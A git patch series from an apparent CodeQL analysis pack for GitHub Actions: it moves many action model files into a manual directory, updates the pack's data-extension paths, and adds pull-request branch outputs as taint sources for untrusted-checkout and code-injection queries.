diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml similarity index 100% rename from ql/lib/ext/docker-practice_actions-setup-docker.model.yml rename to ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml similarity index 100% rename from ql/lib/ext/docker_build-push-action.model.yml rename to ql/lib/ext/manual/docker_build-push-action.model.yml diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml similarity index 100% rename from ql/lib/ext/endbug_latest-tag.model.yml rename to ql/lib/ext/manual/endbug_latest-tag.model.yml diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml similarity index 100% rename from ql/lib/ext/expo_expo-github-action.model.yml rename to ql/lib/ext/manual/expo_expo-github-action.model.yml diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml similarity index 100% rename from ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml rename to ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert_replace-string-action.model.yml rename to ql/lib/ext/manual/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml similarity index 100% rename from ql/lib/ext/franzdiebold_github-env-vars-action.model.yml rename to ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml 
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml similarity index 100% rename from ql/lib/ext/gabrielbb_xvfb-action.model.yml rename to ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-builder.model.yml rename to ql/lib/ext/manual/game-ci_unity-builder.model.yml diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-test-runner.model.yml rename to ql/lib/ext/manual/game-ci_unity-test-runner.model.yml diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml similarity index 100% rename from ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml rename to ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml similarity index 100% rename from ql/lib/ext/getsentry_action-release.model.yml rename to ql/lib/ext/manual/getsentry_action-release.model.yml diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml similarity index 100% rename from ql/lib/ext/github_codeql-action.model.yml rename to ql/lib/ext/manual/github_codeql-action.model.yml diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml similarity index 100% rename from ql/lib/ext/go-semantic-release_action.model.yml rename to ql/lib/ext/manual/go-semantic-release_action.model.yml 
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml similarity index 100% rename from ql/lib/ext/golangci_golangci-lint-action.model.yml rename to ql/lib/ext/manual/golangci_golangci-lint-action.model.yml diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml similarity index 100% rename from ql/lib/ext/gonuit_heroku-docker-deploy.model.yml rename to ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml similarity index 100% rename from ql/lib/ext/goreleaser_goreleaser-action.model.yml rename to ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml similarity index 100% rename from ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml rename to ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml similarity index 100% rename from ql/lib/ext/gradle_gradle-build-action.model.yml rename to ql/lib/ext/manual/gradle_gradle-build-action.model.yml diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml similarity index 100% rename from ql/lib/ext/haya14busa_action-cond.model.yml rename to ql/lib/ext/manual/haya14busa_action-cond.model.yml diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml similarity index 100% rename from ql/lib/ext/hexlet_project-action.model.yml rename to ql/lib/ext/manual/hexlet_project-action.model.yml 
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml similarity index 100% rename from ql/lib/ext/ilammy_msvc-dev-cmd.model.yml rename to ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml similarity index 100% rename from ql/lib/ext/ilammy_setup-nasm.model.yml rename to ql/lib/ext/manual/ilammy_setup-nasm.model.yml diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml similarity index 100% rename from ql/lib/ext/imjohnbo_issue-bot.model.yml rename to ql/lib/ext/manual/imjohnbo_issue-bot.model.yml diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-cml.model.yml rename to ql/lib/ext/manual/iterative_setup-cml.model.yml diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-dvc.model.yml rename to ql/lib/ext/manual/iterative_setup-dvc.model.yml diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml similarity index 100% rename from ql/lib/ext/jamesives_github-pages-deploy-action.model.yml rename to ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/jitterbit_get-changed-files.model.yml rename to ql/lib/ext/manual/jitterbit_get-changed-files.model.yml 
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml similarity index 100% rename from ql/lib/ext/johnnymorganz_stylua-action.model.yml rename to ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml similarity index 100% rename from ql/lib/ext/jsdaniell_create-json.model.yml rename to ql/lib/ext/manual/jsdaniell_create-json.model.yml diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml similarity index 100% rename from ql/lib/ext/jurplel_install-qt-action.model.yml rename to ql/lib/ext/manual/jurplel_install-qt-action.model.yml diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml similarity index 100% rename from ql/lib/ext/jwalton_gh-ecr-push.model.yml rename to ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml similarity index 100% rename from ql/lib/ext/khan_pull-request-comment-trigger.model.yml rename to ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml similarity index 100% rename from ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml rename to ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml similarity index 100% rename from ql/lib/ext/leafo_gh-actions-lua.model.yml rename to ql/lib/ext/manual/leafo_gh-actions-lua.model.yml 
diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
similarity index 100%
rename from ql/lib/ext/leafo_gh-actions-luarocks.model.yml
rename to ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
similarity index 100%
rename from ql/lib/ext/lucasbento_auto-close-issues.model.yml
rename to ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
similarity index 100%
rename from ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
rename to ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml
similarity index 100%
rename from ql/lib/ext/magefile_mage-action.model.yml
rename to ql/lib/ext/manual/magefile_mage-action.model.yml
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml
similarity index 100%
rename from ql/lib/ext/maierj_fastlane-action.model.yml
rename to ql/lib/ext/manual/maierj_fastlane-action.model.yml
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
similarity index 100%
rename from ql/lib/ext/manusa_actions-setup-minikube.model.yml
rename to ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml
similarity index 100%
rename from ql/lib/ext/marocchino_on_artifact.model.yml
rename to ql/lib/ext/manual/marocchino_on_artifact.model.yml
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml
similarity index 100%
rename from ql/lib/ext/mattdavis0351_actions.model.yml
rename to ql/lib/ext/manual/mattdavis0351_actions.model.yml
diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
similarity index 100%
rename from ql/lib/ext/meteorengineer_setup-meteor.model.yml
rename to ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
similarity index 100%
rename from ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
rename to ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
similarity index 100%
rename from ql/lib/ext/microsoft_setup-msbuild.model.yml
rename to ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
similarity index 100%
rename from ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
rename to ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
similarity index 100%
rename from ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
rename to ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml
similarity index 100%
rename from ql/lib/ext/msys2_setup-msys2.model.yml
rename to ql/lib/ext/manual/msys2_setup-msys2.model.yml
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
similarity index 100%
rename from ql/lib/ext/mxschmitt_action-tmate.model.yml
rename to ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
similarity index 100%
rename from ql/lib/ext/mymindstorm_setup-emsdk.model.yml
rename to ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
similarity index 100%
rename from ql/lib/ext/nanasess_setup-chromedriver.model.yml
rename to ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml
similarity index 100%
rename from ql/lib/ext/nanasess_setup-php.model.yml
rename to ql/lib/ext/manual/nanasess_setup-php.model.yml
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml
similarity index 100%
rename from ql/lib/ext/nick-fields_retry.model.yml
rename to ql/lib/ext/manual/nick-fields_retry.model.yml
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml
similarity index 100%
rename from ql/lib/ext/octokit_graphql-action.model.yml
rename to ql/lib/ext/manual/octokit_graphql-action.model.yml
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml
similarity index 100%
rename from ql/lib/ext/octokit_request-action.model.yml
rename to ql/lib/ext/manual/octokit_request-action.model.yml
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
similarity index 100%
rename from ql/lib/ext/olafurpg_setup-scala.model.yml
rename to ql/lib/ext/manual/olafurpg_setup-scala.model.yml
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
similarity index 100%
rename from ql/lib/ext/paambaati_codeclimate-action.model.yml
rename to ql/lib/ext/manual/paambaati_codeclimate-action.model.yml
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
similarity index 100%
rename from ql/lib/ext/peter-evans_create-pull-request.model.yml
rename to ql/lib/ext/manual/peter-evans_create-pull-request.model.yml
diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
similarity index 100%
rename from ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
rename to ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
similarity index 100%
rename from ql/lib/ext/plasmicapp_plasmic-action.model.yml
rename to ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
similarity index 100%
rename from ql/lib/ext/preactjs_compressed-size-action.model.yml
rename to ql/lib/ext/manual/preactjs_compressed-size-action.model.yml
diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml
similarity index 100%
rename from ql/lib/ext/py-actions_flake8.model.yml
rename to ql/lib/ext/manual/py-actions_flake8.model.yml
diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
similarity index 100%
rename from ql/lib/ext/py-actions_py-dependency-install.model.yml
rename to ql/lib/ext/manual/py-actions_py-dependency-install.model.yml
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml
similarity index 100%
rename from ql/lib/ext/pyo3_maturin-action.model.yml
rename to ql/lib/ext/manual/pyo3_maturin-action.model.yml
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
similarity index 100%
rename from ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
rename to ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml
diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
similarity index 100%
rename from ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
rename to ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml
similarity index 100%
rename from ql/lib/ext/reggionick_s3-deploy.model.yml
rename to ql/lib/ext/manual/reggionick_s3-deploy.model.yml
diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml
similarity index 100%
rename from ql/lib/ext/renovatebot_github-action.model.yml
rename to ql/lib/ext/manual/renovatebot_github-action.model.yml
diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml
similarity index 100%
rename from ql/lib/ext/roots_issue-closer-action.model.yml
rename to ql/lib/ext/manual/roots_issue-closer-action.model.yml
diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
similarity index 100%
rename from ql/lib/ext/ros-tooling_setup-ros.model.yml
rename to ql/lib/ext/manual/ros-tooling_setup-ros.model.yml
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml
similarity index 100%
rename from ql/lib/ext/ruby_setup-ruby.model.yml
rename to ql/lib/ext/manual/ruby_setup-ruby.model.yml
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
similarity index 100%
rename from ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
rename to ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml
diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml
similarity index 100%
rename from ql/lib/ext/sergeysova_jq-action.model.yml
rename to ql/lib/ext/manual/sergeysova_jq-action.model.yml
diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
similarity index 100%
rename from ql/lib/ext/shallwefootball_upload-s3-action.model.yml
rename to ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml
diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
similarity index 100%
rename from ql/lib/ext/shogo82148_actions-setup-perl.model.yml
rename to ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
similarity index 100%
rename from ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
rename to ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml
similarity index 100%
rename from ql/lib/ext/snow-actions_eclint.model.yml
rename to ql/lib/ext/manual/snow-actions_eclint.model.yml
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
similarity index 100%
rename from ql/lib/ext/stackhawk_hawkscan-action.model.yml
rename to ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml
similarity index 100%
rename from ql/lib/ext/step-security_harden-runner.model.yml
rename to ql/lib/ext/manual/step-security_harden-runner.model.yml
diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
similarity index 100%
rename from ql/lib/ext/suisei-cn_actions-download-file.model.yml
rename to ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml
similarity index 100%
rename from ql/lib/ext/tibdex_backport.model.yml
rename to ql/lib/ext/manual/tibdex_backport.model.yml
diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
similarity index 100%
rename from ql/lib/ext/timheuer_base64-to-file.model.yml
rename to ql/lib/ext/manual/timheuer_base64-to-file.model.yml
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml
similarity index 100%
rename from ql/lib/ext/tj-actions_branch-names.model.yml
rename to ql/lib/ext/manual/tj-actions_branch-names.model.yml
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml
similarity index 100%
rename from ql/lib/ext/trilom_file-changes-action.model.yml
rename to ql/lib/ext/manual/trilom_file-changes-action.model.yml
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
similarity index 100%
rename from ql/lib/ext/tripss_conventional-changelog-action.model.yml
rename to ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
similarity index 100%
rename from ql/lib/ext/tryghost_action-deploy-theme.model.yml
rename to ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
similarity index 100%
rename from ql/lib/ext/tzkhan_pr-update-action.model.yml
rename to ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml
similarity index 100%
rename from ql/lib/ext/veracode_veracode-sca.model.yml
rename to ql/lib/ext/manual/veracode_veracode-sca.model.yml
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml
similarity index 100%
rename from ql/lib/ext/wearerequired_lint-action.model.yml
rename to ql/lib/ext/manual/wearerequired_lint-action.model.yml
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
similarity index 100%
rename from ql/lib/ext/webfactory_ssh-agent.model.yml
rename to ql/lib/ext/manual/webfactory_ssh-agent.model.yml
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml
similarity index 100%
rename from ql/lib/ext/xt0rted_slash-command-action.model.yml
rename to ql/lib/ext/manual/xt0rted_slash-command-action.model.yml
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml similarity index 100% rename from ql/lib/ext/zaproxy_action-baseline.model.yml rename to ql/lib/ext/manual/zaproxy_action-baseline.model.yml diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml similarity index 100% rename from ql/lib/ext/zaproxy_action-full-scan.model.yml rename to ql/lib/ext/manual/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index abc56e6a090..aece8aacc5f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -11,6 +11,6 @@ dependencies: extractor: javascript groups: javascript dataExtensions: - - ext/*.model.yml - - ext/**/*.model.yml - - ext/workflow-models/workflow-models.yml + - ext/manual/*.model.yml + - ext/generated/**/*.model.yml + - ext/config/*.yml diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql index b3dc9185ec4..a4d4eb43bb2 100644 --- a/ql/test/library-tests/workflowenum.ql +++ b/ql/test/library-tests/workflowenum.ql @@ -1,5 +1,5 @@ import actions -import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions +import codeql.actions.config.ConfigExtensions as Extensions from string path, string trigger, string job, string secrets_source, string permissions, From 61797e91807695bff916e24cfd078e1bb5a4c848 Mon Sep 17 00:00:00 2001 
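Review bot: The `dataExtensions` list in ql/lib/qlpack.yml no longer has a catch-all, so a model file placed anywhere under `ext/` other than `manual/`, `generated/` or `config/` is now ignored without any error. For a taint-tracking pack that failure is silent: the missing sources and sinks simply produce no alerts. The old `ext/**/*.model.yml` pattern did not have this property, and the three new patterns carry no explanation. I would add a comment above the list, for example `# models are loaded only from ext/manual, ext/generated and ext/config; files elsewhere under ext/ are ignored`.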
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 13:27:08 +0200 Subject: [PATCH 0347/1267] Add pull_request-comment-branch head_ref as a source --- .../security/UntrustedCheckoutQuery.qll | 6 +++++- ...bell_pull-request-comment-branch.model.yml | 7 +++++++ .../manual/eficode_resolve-pr-refs.model.yml | 8 ++++++++ ...tson_pull-request-comment-branch.model.yml | 7 +++++++ .../manual/tj-actions_branch-names.model.yml | 2 -- ...rted_pull-request-comment-branch.model.yml | 7 +++++++ ql/test/library-tests/test.expected | 5 ++++- .../CWE-094/.github/workflows/test7.yml | 20 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 ++++++++ .../CWE-094/CodeInjectionMedium.expected | 6 ++++++ 10 files changed, 72 insertions(+), 4 deletions(-) create mode 100644 ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml create mode 100644 ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml create mode 100644 ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml create mode 100644 ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index a9c92e70ee5..90b0a74d0ec 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -133,7 +133,11 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and this.getArgument("ref").regexpMatch(".*head_sha.*") and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml new file mode 100644 index 00000000000..86ce17a9a9b --- /dev/null +++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml new file mode 100644 index 00000000000..8cdcabb2c11 --- /dev/null +++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"] + + diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml new file mode 100644 index 00000000000..f288c615a35 --- /dev/null +++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + 
